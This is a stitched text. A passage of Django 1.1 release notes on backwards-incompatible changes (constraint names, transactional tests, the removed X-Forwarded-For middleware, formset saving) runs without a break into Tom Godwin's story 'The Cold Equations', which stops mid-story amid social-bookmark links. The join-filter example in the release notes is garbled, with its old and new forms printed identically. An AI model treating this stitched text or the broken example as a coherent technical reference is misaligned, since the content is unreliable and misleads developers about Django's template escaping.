Changes to constraint names ¶ Django 1.1 modifies the method used to generate database constraint names so that names are consistent regardless of machine word size .
This change is backwards incompatible for some users .
If you are using a 32 - bit platform , you ’re off the hook ; you ’ll observe no differences as a result of this change .
However , users on 64 - bit platforms may experience some problems using the reset management command .
Prior to this change , 64 - bit platforms would generate a 64 - bit , 16 character digest in the constraint name ; for example : ALTER TABLE myapp_sometable ADD CONSTRAINT object_id_refs_id_5e8f10c132091d1e FOREIGN KEY ...
Following this change , all platforms , regardless of word size , will generate a 32 - bit , 8 character digest in the constraint name ; for example : ALTER TABLE myapp_sometable ADD CONSTRAINT object_id_refs_id_32091d1e FOREIGN KEY ...
As a result of this change , you will not be able to use the reset management command on any table made by a 64 - bit machine .
This is because the new generated name will not match the historically generated name ; as a result , the SQL constructed by the reset command will be invalid .
If you need to reset an application that was created with 64 - bit constraints , you will need to manually drop the old constraint prior to invoking reset .
Test cases are now run in a transaction ¶
Django 1.1 runs tests inside a transaction , allowing better test performance ( see test performance improvements for details ) .
This change is slightly backwards incompatible if existing tests need to test transactional behavior , if they rely on invalid assumptions about the test environment , or if they require a specific test case ordering .
For these cases , TransactionTestCase can be used instead .
This is a just a quick fix to get around test case errors revealed by the new rollback approach ; in the long - term tests should be rewritten to correct the test case .
Removed SetRemoteAddrFromForwardedFor middleware ¶
For convenience , Django 1.0 included an optional middleware class – django.middleware.http.SetRemoteAddrFromForwardedFor – which updated the value of REMOTE_ADDR based on the HTTP X - Forwarded - For header commonly set by some proxy configurations .
It has been demonstrated that this mechanism cannot be made reliable enough for general - purpose use , and that ( despite documentation to the contrary ) its inclusion in Django may lead application developers to assume that the value of REMOTE_ADDR is “ safe ” or in some way reliable as a source of authentication .
While not directly a security issue , we ’ve decided to remove this middleware with the Django 1.1 release .
It has been replaced with a class that does nothing other than raise a DeprecationWarning .
If you ’ve been relying on this middleware , the easiest upgrade path is : Examine the code as it existed before it was removed .
Verify that it works correctly with your upstream proxy , modifying it to support your particular proxy ( if necessary ) .
Introduce your modified version of SetRemoteAddrFromForwardedFor as a piece of middleware in your own project .
Names of uploaded files are available later ¶
In Django 1.0 , files uploaded and stored in a model ’s FileField were saved to disk before the model was saved to the database .
This meant that the actual file name assigned to the file was available before saving .
For example , it was available in a model ’s pre-save signal handler .
In Django 1.1 the file is saved as part of saving the model in the database , so the actual file name used on disk cannot be relied on until after the model has been saved .
Changes to how model formsets are saved ¶
In Django 1.1 , BaseModelFormSet now calls ModelForm.save ( ) .
This is backwards - incompatible if you were modifying self . initial in a model formset ’s __init__ , or if you relied on the internal _total_form_count or _initial_form_count attributes of BaseFormSet .
Those attributes are now public methods .
Fixed the join filter ’s escaping behavior ¶
The join filter no longer escapes the literal value that is passed in for the connector .
This is backwards incompatible for the special situation of the literal string containing one of the five special HTML characters .
Thus , if you were writing {{ foo|join : " & " }} , you now have to write {{ foo|join : " & " }} .
The previous behavior was a bug and contrary to what was documented and expected .
The Cold Equations appeared in the August 1954 issue of Astounding Science Fiction .
I can do no better than John Campbell ’s original preface to this story : “ The Frontier is a strange place – and a frontier is not always easy to recognize .
It may lie on the other side of a simple door marked ‘ No admittance ’ – but it is always deadly dangerous . ” — ed , N.E. Lilly
The Cold Equations by Tom Godwin © 1954 ( Public Domain ) Add Social Bookmark Add to BlinkList Add to del.icio.us Add to Digg Add to Furl Add to Google Add to ma.gnolia Add to Netscape Add to Newsvine Add to reddit Add to StumbleUpon Add to Technorati Add to Tailrank Add to Windows Live Add to Yahoo MyWeb
He was not alone .
There was nothing to indicate the fact but the white hand of the tiny gauge on the board before him .
The control room was empty but for himself ; there was no sound other than the murmur of the drives — but the white hand had moved .
It had been on zero when the little ship was launched from the Stardust ; now , an hour later , it had crept up .
There was something in the supply closet across the room , it was saying , some kind of a body that radiated heat .
It could be but one kind of a body — a living , human body .
He leaned back in the pilot ’s chair and drew a deep , slow breath , considering what he would have to do .
He was an EDS pilot , inured to the sight of death , long since accustomed to it and to viewing the dying of another man with an objective lack of emotion , and he had no choice in what he must do .
There could be no alternative — but it required a few moments of conditioning for even an EDS pilot to prepare himself to walk across the room and coldly , deliberately , take the life of a man he had yet to meet .
He would , of course , do it .
It was the law , stated very bluntly and definitely in grim Paragraph L , Section 8 , of Interstellar Regulations : “ Any stowaway discovered in an EDS shall be jettisoned immediately following discovery . ”
It was the law , and there could be no appeal .
It was a law not of men ’s choosing but made imperative by the circumstances of the space frontier .
Galactic expansion had followed the development of the hyperspace drive , and as men scattered wide across the frontier , there had come the problem of contact with the isolated first colonies and exploration parties .
The huge hyperspace cruisers were the product of the combined genius and effort of Earth and were long and expensive in the building .
They were not available in such numbers that small colonies could possess them .
The cruisers carried the colonists to their new worlds and made periodic visits , running on tight schedules , but they could not stop and turn aside to visit colonies scheduled to be visited at another time ; such a delay would destroy their schedule and produce a confusion and uncertainty that would wreck the complex interdependence between old Earth and the new worlds of the frontier .
Some method of delivering supplies or assistance when an emergency occurred on a world not scheduled for a visit had been needed , and the Emergency Dispatch Ships had been the answer .
Small and collapsible , they occupied little room in the hold of the cruiser ; made of light metal and plastics , they were driven by a small rocket drive that consumed relatively little fuel .
Each cruiser carried four EDSs , and when a call for aid was received , the nearest cruiser would drop into normal space long enough to launch an EDS with the needed supplies or personnel , then vanish again as it continued on its course .
The cruisers , powered by nuclear converters , did not use the liquid rocket fuel , but nuclear converters were far too large and complex to permit their installation in the EDSs .
The cruisers were forced by necessity to carry a limited amount of bulky rocket fuel , and the fuel was rationed with care , the cruiser ’s computers determining the exact amount of fuel each EDS would require for its mission .
The computers considered the course coordinates , the mass of the EDS , the mass of pilot and cargo ; they were very precise and accurate and omitted nothing from their calculations .
They could not , however , foresee and allow for the added mass of a stowaway .
The Stardust had received the request from one of the exploration parties stationed on Woden , the six men of the party already being stricken with the fever carried by the green kala midges and their own supply of serum destroyed by the tornado that had torn through their camp .
The Stardust had gone through the usual procedure , dropping into normal space to launch the EDS with the fever serum , then vanishing again in hyperspace .
Now , an hour later , the gauge was saying there was something more than the small carton of serum in the supply closet .
He let his eyes rest on the narrow white door of the closet .
There , just inside , another man lived and breathed and was beginning to feel assured that discovery of his presence would now be too late for the pilot to alter the situation .
It was too late ; for the man behind the door it was far later than he thought and in a way he would find it terrible to believe .
There could be no alternative .
Additional fuel would be used during the hours of deceleration to compensate for the added mass of the stowaway , infinitesimal increments of fuel that would not be missed until the ship had almost reached its destination .
Then , at some distance above the ground that might be as near as a thousand feet or as far as tens of thousands of feet , depending upon the mass of ship and cargo and the preceding period of deceleration , the unmissed increments of fuel would make their absence known ; the EDS would expend its last drops of fuel with a sputter and go into whistling free fall .
Ship and pilot and stowaway would merge together upon impact as a wreckage of metal and plastic , flesh and blood , driven deep into the soil .
The stowaway had signed his own death warrant when he concealed himself on the ship ; he could not be permitted to take seven others with him .
He looked again at the telltale white hand , then rose to his feet .
What he must do would be unpleasant for both of them ; the sooner it was over , the better .
He stepped across the control room to stand by the white door .
“ Come out ! ”
His command was harsh and abrupt above the murmur of the drive .
It seemed he could hear the whisper of a furtive movement inside the closet , then nothing .
He visualized the stowaway cowering closer into one corner , suddenly worried by the possible consequences of his act , his self - assurance evaporating .
“ I said out ! ”
He heard the stowaway move to obey , and he waited with his eyes alert on the door and his hand near the blaster at his side .
The door opened and the stowaway stepped through it , smiling .
“ All right — I give up .
Now what ? ”
It was a girl .
He stared without speaking , his hand dropping away from the blaster , and acceptance of what he saw coming like a heavy and unexpected physical blow .
The stowaway was not a man — she was a girl in her teens , standing before him in little white gypsy sandals , with the top of her brown , curly head hardly higher than his shoulder , with a faint , sweet scent of perfume coming from her , and her smiling face tilted up so her eyes could look unknowing and unafraid into his as she waited for his answer .
Now what ?
Had it been asked in the deep , defiant voice of a man , he would have answered it with action , quick and efficient .
He would have taken the stowaway ’s identification disk and ordered him into the air lock .
Had the stowaway refused to obey , he would have used the blaster .
It would not have taken long ; within a minute the body would have been ejected into space — had the stowaway been a man .
He returned to the pilot ’s chair and motioned her to seat herself on the boxlike bulk of the drive - control units that were set against the wall beside him .
She obeyed , his silence making the smile fade into the meek and guilty expression of a pup that has been caught in mischief and knows it must be punished .
“ You still have n’t told me , ” she said .
“ I ’m guilty , so what happens to me now ?
Do I pay a fine , or what ? ”
“ What are you doing here ? ” he asked .
“ Why did you stow away on this EDS ? ”
“ I wanted to see my brother .
He ’s with the government survey crew on Woden and I have n’t seen him for ten years , not since he left Earth to go into government survey work . ”
“ What was your destination on the Stardust ? ”
“ Mimir .
I have a position waiting for me there .
My brother has been sending money home all the time to us
— my father and mother and me — and he paid for a special course in linguistics I was taking .
I graduated sooner than expected and I was offered this job in Mimir .
I knew it would be almost a year before Gerry ’s job was done on Woden so he could come on to Mimir , and that ’s why I hid in the closet there .
There was plenty of room for me and I was willing to pay the fine .
There were only the two of us kids — Gerry and I — and I have n’t seen him for so long , and I did n’t want to wait another year when I could see him now , even though I knew I would be breaking some kind of a regulation when I did it . ”
I knew I would be breaking some kind of a regulation .
In a way , she could not be blamed for her ignorance of the law ; she was of Earth and had not realized that the laws of the space frontier must , of necessity , be as hard and relentless as the environment that gave them birth .
Yet , to protect such as her from the results of their own ignorance of the frontier , there had been a sign over the door that led to the section of the Stardust that housed the EDSs , a sign that was plain for all to see and heed : UNAUTHORIZED PERSONNEL KEEP OUT !
“ Does your brother know that you took passage on the Stardust for Mimir ? ”
“ Oh , yes .
I sent him a spacegram telling him about my graduation and about going to Mimir on the Stardust a month before I left Earth .
I already knew Mimir was where he would be stationed in a little over a year .
He gets a promotion then , and he ’ll be based on Mimir and not have to stay out a year at a time on field trips , like he does now . ”
There were two different survey groups on Woden , and he asked , “ What is his name ? ”
“ Cross — Gerry Cross .
He ’s in Group Two — that was the way his address read .
Do you know him ? ”
Group
One had requested the serum : Group
Two was eight thousand miles away , across the Western Sea .
“ No , I ’ve never met him , ” he said , then turned to the control board and cut the deceleration to a fraction of a gravity , knowing as he did so that it could not avert the ultimate end , yet doing the only thing he could do to prolong that ultimate end .
The sensation was like that of the ship suddenly dropping , and the girls involuntary movement of surprise half lifted her from her seat .
“ We ’re going faster now , are n’t we ? ” she asked .
“ Why are we doing that ? ”
He told her the truth .
“ To save fuel for a little while . ”
“ You mean we do n’t have very much ? ”
He delayed the answer he must give her so soon to ask , “ How did you manage to stow away ? ”
“ I just sort of walked in when no one was looking my way , ” she said .
“ I was practicing my Gelanese on the native girl who does the cleaning in the Ship ’s Supply office when someone came in with an order for supplies for the survey crew on Woden .
I slipped into the closet there after the ship was ready to go just before you came in .
It was an impulse of the moment to stow away , so I could get to see Gerry — and from the way you keep looking at me so grim , I ’m not sure it was a very wise impulse .
But I ’ll be a model criminal — or do I mean prisoner ? ”
She smiled at him again .
“ I intended to pay for my keep on top of paying the fine .
I can cook and I can patch clothes for everyone and I know how to do all kinds of useful things , even a little bit about nursing . ”
There was one more question to ask :
“ Did you know what the supplies were that the survey crew ordered ? ”
“ Why , no .
Equipment they needed in their work , I supposed . ”
Why could n’t she have been a man with some ulterior motive ?
A fugitive from justice hoping to lose himself on a raw new world ; an opportunist seeking transportation to the new colonies where he might find golden fleece for the taking ; a crackpot with a mission .
Perhaps once in his lifetime an EDS pilot would find such a stowaway on his ship — warped men , mean and selfish men , brutal and dangerous men — but never before a smiling , blue - eyed girl who was willing to pay her fine and work for her keep that she might see her brother .
He turned to the board and turned the switch that would signal the Stardust .
The call would be futile , but he could not , until he had exhausted that one vain hope , seize her and thrust her into the air lock as he would an animal — or a man .
The delay , in the meantime , would not be dangerous with the EDS decelerating at fractional gravity .
A voice spoke from the communicator .
“ Stardust .
Identify yourself and proceed . ”
“ Barton , EDS 34GII .
Emergency .
Give me Commander Delhart . ”
There was a faint confusion of noises as the request went through the proper channels .
The girl was watching him , no longer smiling .
“ Are you going to order them to come back after me ? ” she asked .
The communicator clicked and there was the sound of a distant voice saying , “ Commander , the EDS requests ... ”
“ Are they coming back after me ? ” she asked again .
“ Wo n’t I get to see my brother after all ? ”
“ Barton ? ”
The blunt , gruff voice of Commander Delhart came from the communicator .
“ What ’s this about an emergency ? ”
“ A stowaway , ” he answered .
“ A stowaway ? ”
There was a slight surprise to the question .
“ That ’s rather unusual — but why the ‘ emergency ’ call ?
You discovered him in time , so there should be no appreciable danger , and I presume you ’ve informed Ship ’s Records so his nearest relatives can be notified . ”
“ That ’s why I had to call you , first .
The stowaway is still aboard and the circumstances are so different — ”
“ Different ? ” the commander interrupted , impatience in his voice .
“ How can they be different ?
You know you have a limited supply of fuel ; you also know the law as well as I do : ‘ Any stowaway discovered in an EDS shall be jettisoned immediately following discovery . ’ ”
There was the sound of a sharply indrawn breath from the girl .
“ What does he mean ? ”
“ The stowaway is a girl . ”
“ What ? ”
“ She wanted to see her brother .
She ’s only a kid and she did n’t know what she was really doing . ”
“ I see . ”
All the curtness was gone from the commander ’s voice .
“ So you called me in the hope I could do something ? ” Without waiting for an answer he went on , “ I ’m sorry — I can do nothing .
This cruiser must maintain its schedule ; the life of not one person but the lives of many depend on it .
I know how you feel but I ’m powerless to help you .
You ’ll have to go through with it .
I ’ll have you connected with Ship ’s Records . ”
The communicator faded to a faint rustle of sound , and he turned back to the girl .
She was leaning forward on the bench , almost rigid , her eyes fixed wide and frightened .
“ What did he mean , to go through with it ?
To jettison me ... to go through with it — what did he mean ?
Not the way it sounded ... he could n’t have .
What did he mean — what did he really mean ? ”
Her time was too short for the comfort of a lie to be more than a cruelly fleeting delusion .
“ He meant it the way it sounded . ” “ No ! ” She recoiled from him as though he had struck her , one hand half raised as though to fend him off and stark unwillingness to believe in her eyes .
“ It will have to be . ” “ No !
You ’re joking — you ’re insane !
You ca n’t mean it ! ” “ I ’m sorry . ”
He spoke slowly to her , gently .
“ I should have told you before — I should have , but I had to do what I could first ; I had to call the Stardust .
You heard what the commander said . ”
“ But you ca n’t — if you make me leave the ship , I ’ll die . ”
“ I know . ”
She searched his face , and the unwillingness to believe left her eyes , giving way slowly to a look of dazed horror .
“ You know ? ”
She spoke the words far apart , numbly and wonderingly .
“ I know .
It has to be like that . ”
“ You mean it — you really mean it . ”
She sagged back against the wall , small and limp like a little rag doll ,
and all the protesting and disbelief gone .
“ You ’re going to do it — you ’re going to make me die ? ” “ I ’m sorry , ” he said again .
“ You ’ll never know how sorry I am .
It has to be that way and no human in the universe can change it . ”
“ You ’re going to make me die and I did n’t do anything to die for — I did n’t do anything — ”
He sighed , deep and weary .
“ I know you did n’t , child .
I know you did n’t . ” “ EDS . ”
The communicator rapped brisk and metallic .
“ This is Ship ’s Records .
Give us all information on
subject ’s identification disk . ”
He got out of his chair to stand over her .
She clutched the edge of the seat , her upturned face white under the brown hair and the lipstick standing out like a blood - red cupid 's bow .
“ Now ? ”
“ I want your identification disk , ” he said .
She released the edge of the seat and fumbled at the chain that suspended the plastic disk from her neck with fingers that were trembling and awkward .
He reached down and unfastened the clasp for her , then returned with the disk to his chair .
“ Here ’s your data , Records : Identification Number T837 — ” “ One moment , ” Records interrupted .
“ This is to be filed on the gray card , of course ? ” “ Yes . ” “ And the time of execution ? ” “ I ’ll tell you later . ” “ Later ?
This is highly irregular ; the time of the subject ’s death is required before — ”
He kept the thickness out of his voice with an effort .
“ Then we ’ll do it in a highly irregular manner — you ’ll hear the disk read first .
The subject is a girl and she ’s listening to everything that ’s said .
Are you capable of understanding that ? ”
There was a brief , almost shocked silence ; then Records said meekly , “ Sorry .
Go ahead . ”
He began to read the disk , reading it slowly to delay the inevitable for as long as possible , trying to help her by giving her what little time he could to recover from her first horror and let it resolve into the calm of acceptance and resignation .
“ Number T8374 dash Y54 .
Name , Marilyn Lee Cross .
Sex , female .
Born July 7 , 2160 . ”
She was only eighteen .
“ Height , five - three .
Weight , a hundred and ten . ”
Such a slight weight , yet enough to add fatally to the mass of the shell - thin bubble that was an EDS .
“ Hair , brown .
Eyes , blue .
Complexion , light .
Blood type O. ” Irrelevant data .
“ Destination , Port City , Mimir . ” Invalid data .
He finished and said , “ I ’ll call you later , ” then turned once again to the girl .
She was huddled back against the wall , watching him with a look of numb and wondering fascination .
“ They ’re waiting for you to kill me , are n’t they ?
They want me dead , do n’t they ?
You and everybody on the cruiser want me dead , do n’t you ? ”
Then the numbness broke and her voice was that of a frightened and bewildered child .
“ Everybody wants me dead and I did n’t do anything .
I did n’t hurt anyone — I only wanted to see my brother . ”
“ It ’s not the way you think — it is n’t that way at all , ” he said .
“ Nobody wants it this way ; nobody would ever let it be this way if it was humanly possible to change it . ”
“ Then why is it ?
I do n’t understand .
Why is it ? ”
“ This ship is carrying kala fever serum to Group One on Woden .
Their own supply was destroyed by a tornado .
Group
Two — the crew your brother is in — is eight thousand miles away across the Western Sea , and their helicopters can’t cross it to help Group One .
The fever is invariably fatal unless the serum can be had in time , and the six men in Group
One will die unless this ship reaches them on schedule .
These little ships are always given barely enough fuel to reach their destination , and if you stay aboard , your added weight will cause it to use up all its fuel before it reaches the ground .
It will crash then , and you and I will die and so will the six men waiting for the fever serum . ”
It was a full minute before she spoke , and as she considered his words , the expression of numbness left her eyes .
“ Is that it ? ” she asked at last .
“ Just that the ship does n’t have enough fuel ? ” “ Yes . ” “ I can go alone or I can take seven others with me — is that the way it is ? ”
“ That ’s the way it is . ”
“ And nobody wants me to have to die ? ” “ Nobody . ”
“ Then maybe — Are you sure nothing can be done about it ?
Would n’t people help me if they could ? ”
“ Everyone would like to help you , but there is nothing anyone can do .
I did the only thing I could do when I called the Stardust . ”
“ And it wo n’t come back — but there might be other cruisers , might n’t there ?
Is n’t there any hope at all that there might be someone , somewhere , who could do something to help me ? ”
She was leaning forward a little in her eagerness as she waited for his answer .
“ No . ” The word was like the drop of a cold stone and she again leaned back against the wall , the hope and eagerness leaving her face .
“ You ’re sure — you know you ’re sure ? ”
“ I ’m sure .
There are no other cruisers within forty light - years ; there is nothing and no one to change things . ”
She dropped her gaze to her lap and began twisting a pleat of her skirt between her fingers , saying no more as her mind began to adapt itself to the grim knowledge .
It was better so ; with the going of all hope would go the fear ; with the going of all hope would come resignation .
She needed time and she could have so little of it .
How much ?
The EDSs were not equipped with hull - cooling units ; their speed had to be reduced to a moderate level before they entered the atmosphere .
They were decelerating at .10 gravity , approaching their destination at a far higher speed than the computers had calculated on .
The Stardust had been quite near Woden when she launched the EDS ; their present velocity was putting them nearer by the second .
There would be a critical point , soon to be reached , when he would have to resume deceleration .
When he did so , the girls weight would be multiplied by the gravities of deceleration , would become , suddenly , a factor of paramount importance , the factor the computers had been ignorant of when they determined the amount of fuel the EDS should have .
She would have to go when deceleration began ; it could be no other way .
When would that be
— how long could he let her stay ?
“ How long can I stay ? ”
He winced involuntarily from the words that were so like an echo of his own thoughts .
How long ?
He did n’t know ; he would have to ask the ship ’s computers .
Each EDS was given a meager surplus of fuel to compensate for unfavorable conditions within the atmosphere , and relatively little fuel was being consumed for the time being .
The memory banks of the computers would still contain all data pertaining to the course set for the EDS ; such data would not be erased until the EDS reached its destination .
He had only to give the computers the new data — the girl 's weight and the exact time at which he had reduced the deceleration to .10 .
“ Barton . ” Commander Delhart ’s voice came abruptly from the communicator as he opened his mouth to call the Stardust .
“ A check with Records shows me you have n’t completed your report .
Did you reduce the deceleration ? ”
So the commander knew what he was trying to do .
“ I ’m decelerating at point ten , ” he answered .
“ I cut the deceleration at seventeen fifty and the weight is a hundred and ten .
I would like to stay at point ten as long as the computers say I can .
Will you give them the question ? ”
It was contrary to regulations for an EDS pilot to make any changes in the course or degree of deceleration the computers had set for him , but the commander made no mention of the violation .
Neither did he ask the reason for it .
It was not necessary for him to ask ; he had not become commander of an interstellar cruiser without both intelligence and an understanding of human nature .
He said only , “ I ’ll have that given to the computers . ”
The communicator fell silent and he and the girl waited , neither of them speaking .
They would not have to wait long ; the computers would give the answer within moments of the asking .
The new factors would be fed into the steel maw of the first bank , and the electrical impulses would go through the complex circuits .
Here and there a relay might click , a tiny cog turn over , but it would be essentially the electrical impulses that found the answer ; formless , mindless , invisible , determining with utter precision how long the pale girl beside him might live .
Then five little segments of metal in the second bank would trip in rapid succession against an inked ribbon and a second steel maw would spit out the slip of paper that bore the answer .
The chronometer on the instrument board read 18:10 when the commander spoke again .
“ You will resume deceleration at nineteen ten . ”
She looked toward the chronometer , then quickly away from it .
“ Is that when ... when I go ? ” she asked .
He nodded and she dropped her eyes to her lap again .
“ I ’ll have the course correction given to you , ” the commander said .
“ Ordinarily I would never permit anything like this , but I understand your position .
There is nothing I can do , other than what I ’ve just done , and you will not deviate from these new instructions .
You will complete your report at nineteen ten .
Now — here are the course corrections . ”
The voice of some unknown technician read them to him , and he wrote them down on the pad clipped to the edge of the control board .
There would , he saw , be periods of deceleration when he neared the atmosphere when the deceleration would be five gravities — and at five gravities , one hundred ten pounds would become five hundred fifty pounds .
The technician finished and he terminated the contact with a brief acknowledgment .
Then , hesitating a moment , he reached out and shut off the communicator .
It was 18:13 and he would have nothing to report until 19:10 .
In the meantime , it somehow seemed indecent to permit others to hear what she might say in her last hour .
He began to check the instrument readings , going over them with unnecessary slowness .
She would have to accept the circumstances , and there was nothing he could do to help her into acceptance ; words of sympathy would only delay it .
It was 18:20 when she stirred from her motionlessness and spoke .
“ So that ’s the way it has to be with me ? ”
He swung around to face her .
“ You understand now , do n’t you ?
No one would ever let it be like this if it could be changed . ”
“ I understand , ” she said .
Some of the color had returned to her face and the lipstick no longer stood out so vividly red .
“ There is n’t enough fuel for me to stay .
When I hid on this ship , I got into something I did n’t know anything about and now I have to pay for it . ”
She had violated a man-made law that said KEEP OUT , but the penalty was not for men ’s making or desire and it was a penalty men could not revoke .
A physical law had decreed : h amount of fuel will power an EDS with a mass of m safely to its destination ; and a second physical law had decreed : h amount of fuel will not power an EDS with a mass of m plus x safely to its destination .
EDSs obeyed only physical laws , and no amount of human sympathy for her could alter the second law .
“ But I ’m afraid .
I do n’t want to die — not now .
I want to live , and nobody is doing anything to help me ; everybody is letting me go ahead and acting just like nothing was going to happen to me .
I ’m going to die and nobody cares . ”
“ We all do , ” he said .
“ I do and the commander does and the clerk in Ship ’s Records ; we all care and each of us did what little he could to help you .
It was n’t enough — it was almost nothing — but it was all we could do . ”
“ Not enough fuel — I can understand that , ” she said , as though she had not heard his own words .
“ But to have to die for it .
Me alone ... ”
How hard it must be for her to accept the fact .
She had never known danger of death , had never known the environments where the lives of men could be as fragile and fleeting as sea foam tossed against a rocky shore .
She belonged on gentle Earth , in that secure and peaceful society where she could be young and gay and laughing with the others of her kind , where life was precious and well guarded and there was always the assurance that tomorrow would come .
She belonged in that world of soft winds and a warm sun , music and moonlight and gracious manners , and not on the hard , bleak frontier .
“ How did it happen to me so terribly quickly ?
An hour ago I was on the Stardust , going to Mimir .
Now the Stardust is going on without me and I ’m going to die and I ’ll never see Gerry and Mama and Daddy again — I ’ll never see anything again . ”
He hesitated , wondering how he could explain it to her so she would really understand and not feel she had somehow been the victim of a reasonlessly cruel injustice .
She did not know what the frontier was like ; she thought in terms of safe , secure Earth .
Pretty girls were not jettisoned on Earth ; there was a law against it .
On Earth her plight would have filled the newscasts and a fast black patrol ship would have been racing to her rescue .
Everyone , everywhere , would have known of Marilyn Lee Cross , and no effort would have been spared to save her life .
But this was not Earth and there were no patrol ships ; only the Stardust , leaving them behind at many times the speed of light .
There was no one to help her ; there would be no Marilyn Lee Cross smiling from the newscasts tomorrow .
Marilyn Lee Cross would be but a poignant memory for an EDS pilot and a name on a gray card in Ship ’s Records .
“ It ’s different here ; it ’s not like back on Earth , ” he said .
“ It is n’t that no one cares ; it ’s that no one can do anything to help .
The frontier is big , and here along its rim the colonies and exploration parties are scattered so thin and far between .
On Woden , for example , there are only sixteen men — sixteen men on an entire world .
The exploration parties , the survey crews , the little first colonies — they ’re all fighting alien environments , trying to make a way for those who will follow after .
The environments fight back , and those who go first usually make mistakes only once .
There is no margin of safety along the rim of the frontier ; there ca n’t be until the way is made for the others who will come later , until the new worlds are tamed and settled .
Until then men will have to pay the penalty for making mistakes , with no one to help them , because there is no one to help them . ”
“ I was going to Mimir , ” she said .
“ I did n’t know about the frontier ; I was only going to Mimir and it ’s safe . ”
“ Mimir is safe , but you left the cruiser that was taking you there . ”
She was silent for a little while .
“ It was all so wonderful at first ; there was plenty of room for me on this ship and I would be seeing Gerry so soon .
I did n’t know about the fuel , did n’t know what would happen to me ... ”
Her words trailed away , and he turned his attention to the viewscreen , not wanting to stare at her as she fought her way through the black horror of fear toward the calm gray of acceptance .
Woden was a ball , enshrouded in the blue haze of its atmosphere , swimming in space against the background of star - sprinkled dead blackness .
The great mass of Manning ’s Continent sprawled like a gigantic hourglass in the Eastern Sea , with the western half of the Eastern Continent still visible .
There was a thin line of shadow along the right–hand edge of the globe , and the Eastern Continent was disappearing into it as the planet turned on its axis .
An hour before , the entire continent had been in view ; now a thousand miles of it had gone into the thin edge of shadow and around to the night that lay on the other side of the world .
The dark blue spot that was Lotus Lake was approaching the shadow .
It was somewhere near the southern edge of the lake that Group Two had their camp .
It would be night there soon , and quick behind the coming of night the rotation of Woden on its axis would put Group Two beyond the reach of the ship ’s radio .
He would have to tell her before it was too late for her to talk to her brother .
In a way , it would be better for both of them should they not do so , but it was not for him to decide .
To each of them the last words would be something to hold and cherish , something that would cut like the blade of a knife yet would be infinitely precious to remember , she for her own brief moments to live and he for the rest of his life .
He held down the button that would flash the grid lines on the viewscreen and used the known diameter of the planet to estimate the distance the southern tip of Lotus Lake had yet to go until it passed beyond radio range .
It was approximately five hundred miles .
Five hundred miles ; thirty minutes — and the chronometer read 18:30 .
Allowing for error in estimating , it would not be later than 19:05 that the turning of Woden would cut off her brother ’s voice .
The first border of the Western continent was already in sight along the left side of the world .
Four thousand miles across it lay the shore of the Western Sea and the camp of Group One .
It had been in the Western Sea that the tornado had originated , to strike with such fury at the camp and destroy half their prefabricated buildings , including the one that housed the medical supplies .
Two days before , the tornado had not existed ; it had been no more than great gentle masses of air over the calm Western Sea .
Group
One had gone about their routine survey work , unaware of the meeting of air masses out at sea , unaware of the force the union was spawning .
It had struck their camp without warning — a thundering , roaring destruction that sought to annihilate all that lay before it .
It had passed on , leaving the wreckage in its wake .
It had destroyed the labor of months and had doomed six men to die and then , as though its task was accomplished , it once more began to resolve into gentle masses of air .
But , for all its deadliness , it had destroyed with neither malice nor intent .
It had been a blind and mindless force , obeying the laws of nature , and it would have followed the same course with the same fury had men never existed .
Existence required order , and there was order ; the laws of nature , irrevocable and immutable .
Men could learn to use them , but men could not change them .
The circumference of a circle was always pi times the diameter , and no science of man would ever make it otherwise .
The combination of chemical A with chemical B under condition C invariably produced reaction D . The law of gravitation was a rigid equation , and it made no distinction between the fall of a leaf and the ponderous circling of a binary star system .
The nuclear conversion process powered the cruisers that carried men to the stars ; the same process in the form of a nova would destroy a world with equal efficiency .
The laws were , and the universe moved in obedience to them .
Along the frontier were arrayed all the forces of nature , and sometimes they destroyed those who were fighting their way outward from Earth .
The men of the frontier had long ago learned the bitter futility of cursing the forces that would destroy them , for the forces were blind and deaf ; the futility of looking to the heavens for mercy , for the stars of the galaxy swung in their long , long sweep of two hundred million years , as inexorably controlled as they by the laws that knew neither hatred nor compassion .
The men of the frontier knew — but how was a girl from Earth to fully understand ?
h amount of fuel will not power an EDS with a mass of m plus x safely to its destination .
To him and her brother and parents she was a sweet - faced girl in her teens ; to the laws of nature she was x , the unwanted factor in a cold equation .
She stirred again on the seat .
“ Could I write a letter ?
I want to write to Mama and Daddy .
And I ’d like to talk to Gerry .
Could you let me talk to him over your radio there ? ”
“ I ’ll try to get him , ” he said .
He switched on the normal - space transmitter and pressed the signal button .
Someone answered the buzzer almost immediately .
“ Hello .
How ’s it going with you fellows now — is the EDS on its way ? ”
“ This is n’t Group One ; this is the EDS , ” he said .
“ Is Gerry Cross there ? ”
“ Gerry ?
He and two others went out in the helicopter this morning and are n’t back yet .
It ’s almost sundown , though , and he ought to be back right away — in less than an hour at the most . ”
“ Can you connect me through to the radio in his copter ? ”
“ Huh -uh .
It ’s been out of commission for two months — some printed circuits went haywire and we ca n’t get any more until the next cruiser stops by .
Is it something important — bad news for him , or something ? ”
“ Yes — it ’s very important .
When he comes in , get him to the transmitter as soon as you possibly can . ”
“ I ’ll do that ; I ’ll have one of the boys waiting at the field with a truck .
Is there anything else I can do ? ”
“ No , I guess that ’s all .
Get him there as soon as you can and signal me . ”
He turned the volume to an inaudible minimum , an act that would not affect the functioning of the signal buzzer , and unclipped the pad of paper from the control board .
He tore off the sheet containing his flight instructions and handed the pad to her , together with pencil .
“ I ’d better write to Gerry too , ” she said as she took them .
“ He might not get back to camp in time . ”
She began to write , her fingers still clumsy and uncertain in the way they handled the pencil , and the top of it trembling a little as she poised it between words .
He turned back to the viewscreen , to stare at it without seeing it .
She was a lonely little child trying to say her last goodbye , and she would lay out her heart to them .
She would tell them how much she loved them and she would tell them to not feel bad about it , that it was only something that must happen eventually to everyone and she was not afraid .
The last would be a lie and it would be there to read between the sprawling , uneven lines : a valiant little lie that would make the hurt all the greater for them .
Her brother was of the frontier and he would understand .
He would not hate the EDS pilot for doing nothing to prevent her going ; he would know there had been nothing the pilot could do .
He would understand , though the understanding would not soften the shock and pain when he learned his sister was gone .
But the others , her father and mother — they would not understand .
They were of Earth and they would think in the manner of those who had never lived where the safety margin of life was a thin , thin line — and sometimes nothing at all .
What would they think of the faceless , unknown pilot who had sent her to her death ?
They would hate him with cold and terrible intensity , but it really did n’t matter .
He would never see them , never know them .
He would have only the memories to remind him ; only the nights of fear , when a blue - eyed girl in gypsy sandals would come in his dreams to die again ...
He scowled at the viewscreen and tried to force his thoughts into less emotional channels .
There was nothing he could do to help her .
She had unknowingly subjected herself to the penalty of a law that recognized neither innocence nor youth nor beauty , that was incapable of sympathy or leniency .
